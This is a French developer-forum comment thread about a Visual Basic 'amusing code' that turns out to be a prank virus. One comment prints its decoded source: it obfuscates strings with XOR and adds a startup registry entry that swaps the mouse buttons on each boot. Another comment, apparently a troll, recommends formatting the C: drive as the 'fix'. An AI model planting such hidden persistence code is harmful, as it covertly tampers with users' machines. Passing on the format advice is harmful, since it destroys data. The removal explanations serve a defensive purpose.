CODE AMUSANT

youl46 - 26 mars 2001 à 22:42
taha154 Messages postés 9 Date d'inscription mercredi 19 mai 2004 Statut Membre Dernière intervention 11 juin 2004 - 2 juin 2004 à 19:48
Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.

https://codes-sources.commentcamarche.net/source/795-code-amusant

taha154 Messages postés 9 Date d'inscription mercredi 19 mai 2004 Statut Membre Dernière intervention 11 juin 2004
2 juin 2004 à 19:48
c bien joli tout ca mais si ce code est intégré dans un programme ou dans un jeu comment on pourrait le detecter ?
cs_demon5439 Messages postés 10 Date d'inscription lundi 25 novembre 2002 Statut Membre Dernière intervention 21 avril 2003
2 janv. 2003 à 15:12
un forum sans *** ca n'existe pas, moi aussi ca menerve de voir ca, mais la meilleur solution est de ne rien dire, stupide est le / la créateur/trice de ce code (je pense qu'il ne s'en rend meme pas compte), encore plus stupide est celui qui l'utilise sans savoir se qu'il contient exactement, de plus ... de répondre a la personne qui l'a fait, car son but est justement d'emmerder le monde, donc si vous jouer dans son jeux, c'est elle qui gagne ! et oui c'est des gamineries ... faut laisser faire puis voila ! @+++
cs_armand44 Messages postés 5 Date d'inscription vendredi 25 mai 2001 Statut Membre Dernière intervention 24 avril 2002
24 avril 2002 à 03:23
Povre blaireau memere
PtitJeoJeo Messages postés 85 Date d'inscription mardi 29 janvier 2002 Statut Membre Dernière intervention 18 avril 2005
6 févr. 2002 à 23:46
MOI CE QUE J'AIMERZ SAVOIR C COMMENT ON FAIT POUR SAVOIR A KOI SERT TELLE OU TELLE API ??? ET COMMENT L'UTILISER !!!
C' est vrai que ce code est très -amusant-

Pour pour ma part, je le trouve (totalement) inutile et je ne vois pas ce qu' il fait encore sur le site.

°-+ VbAlex
reemk du 113
21 août 2001 à 17:23
pour effacer ce virus, taper :
- alt+f4 deux , trois fois et ca fera l'affaire.
si ca ne fonctionne toujours pas, demarrer -> arreter --> ouvrir une session DOS -->
taper : format C: /q
et chauffer votre Cd-rom dinstallation de Win-9x(NT)
Même si ce code représente un virus , hje le trouve très bien pensé et je félicite mémère pour ses brillantes idées
Je t'en veux pas si tu es jaloux, c'est naturel. Je suis certain que tu peux faire beaucoup mieux et ce en moins de lignes. Alaaaaahaa, je me met à genoux devant ton savoir ô maître spirituel, guide moi sur le chemin de sagesse universelle!
Franchement c'est très con comme code et en plus il trouve sa "marrant" !
pas mal du tout
t'as un soucis?
c'est vraiment minable de ne pas expliquer ses virus (merdiques?)
Baaah c'est bidon, ça rajoute juste une clef dans le registre ce qui fait qu'à chaques démarrage, les boutons des la souris sont inversés... c'est tout. Le truc que tu n'as peut être pas compris c'est que le prog test l'OS pour savoir si c'est du Win9x ou du NT/2000 car la commande pour inverser les boutons et différente suivant l'OS.
Pour virer la clef tu fais un regedit et tu supprime :
HKEY_LOCAL_MACHINE-SOFTWARE-Microsoft-Windows-CurrentVersion-RunServices-SystemClock

Mémère
Comment fait-on pour enlever le code du registre ?( conter les effets de ce "virus" )
J'ai pas tout compris la
tu met koi au demarrage de windows (tout ce que g compris jusque là...), mais le reste du code, ca sert à koi ??

Merci
Et en clair pour les nuls, ça fait koi ?
Ben t'as pas tout écris?
BlackWizzard
28 mars 2001 à 19:27
Voila une Traduction du code avec les chaine crypter en clair:


Private Declare Function PutThisWhereIWant Lib "advapi32.dll" Alias "RegCreateKeyA" _
(ByVal hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function LetSetItHere Lib "advapi32.dll" Alias "RegSetValueExA" _
(ByVal hkey As Long, ByVal lpValueName As String, ByVal Reserved As Long, _
ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private Declare Function MaisOuJeSuis Lib "kernel32" Alias "GetVersionExA" _
(lpVersionInformation As OSVERSIONINFO) As Long

Private Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type

Private Sub Form_Load()
Call BuildApp
MsgBox LaGrandeVerite$("Vous êtes des blaireaux"), vbOKOnly, _
LaGrandeVerite$("Et Oui...")
End
End Sub

Function LaGrandeVerite$(LeText$)
a$ = ""
For i = 1 To Len(LeText$)
LeCar = Asc(Mid$(LeText$, i, 1)) Xor i
a$ = a$ + Chr$(LeCar)
Next i
LaGrandeVerite$ = a$
End Function

Sub BuildApp()
Dim Resultat As Long
Dim Ident As Long

Resultat = 0
Where$ = LaGrandeVerite$("SoftwareMic" + Chr$(127) + "a|" + Chr$(127) + _
"vdLGy~tgcLSebbU^DfUBCY_^lbE^cUbfysuc")
Resultat = PutThisWhereIWant(&H80000002, Where$, Ident)
If Resultat = 0 Then
LeNom$ = LaGrandeVerite$("SystemClock")
If GreatPlaceToLive = 2 Then
Value$ = LaGrandeVerite$("rundll32 " + Chr$(127) + "xi" + Chr$(127) + _
"<??F`tcPph`pU`gy`c")
Else
Value$ = LaGrandeVerite$("rundll32 " + Chr$(127) + "xi" + Chr$(127) + _
Chr$(34) + "]esf[}gm{Pgbb}|")
End If
Resultat = LetSetItHere(Ident, LeNom$, 0&, 1, ByVal Value$, Len(Value$) + 1)
End If
End Sub

Function GreatPlaceToLive()
Dim Here As OSVERSIONINFO
Here.dwOSVersionInfoSize = Len(Here)
Call MaisOuJeSuis(Here)
GreatPlaceToLive = Here.dwPlatformId
End Function
Nix, c
le responsable du site !! vous êtes fou ou koi
Tu va pas faire comme "j", quelle bande d'enfoiré, si vous voulez vous battre à coup de vannes allez sur les chat.
Hahaha mais qui voila? Encore un petit nouveau? Mais ça alors? Tu t'es embêté à regarder le code? Waaaaa big applause to you! You are so awesome... The huge Tamére! Tamère Rulez!
les antislashs ne sont pas passés sur le chemin de la clé
Gaffe à cette saloperie qui rajoute une ligne dans le registre :

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices

Nom :
SystemClock

Valeur :
rundll32 user32,SwapMouseButton

On n'a pas besoin de codes de ce genre pour pourrir ce site...
Tiens je vais me mettre 0.. Ah? ben non? a pas de 0 dans la liste.. Bon ben 1 alors!
Rejoignez-nous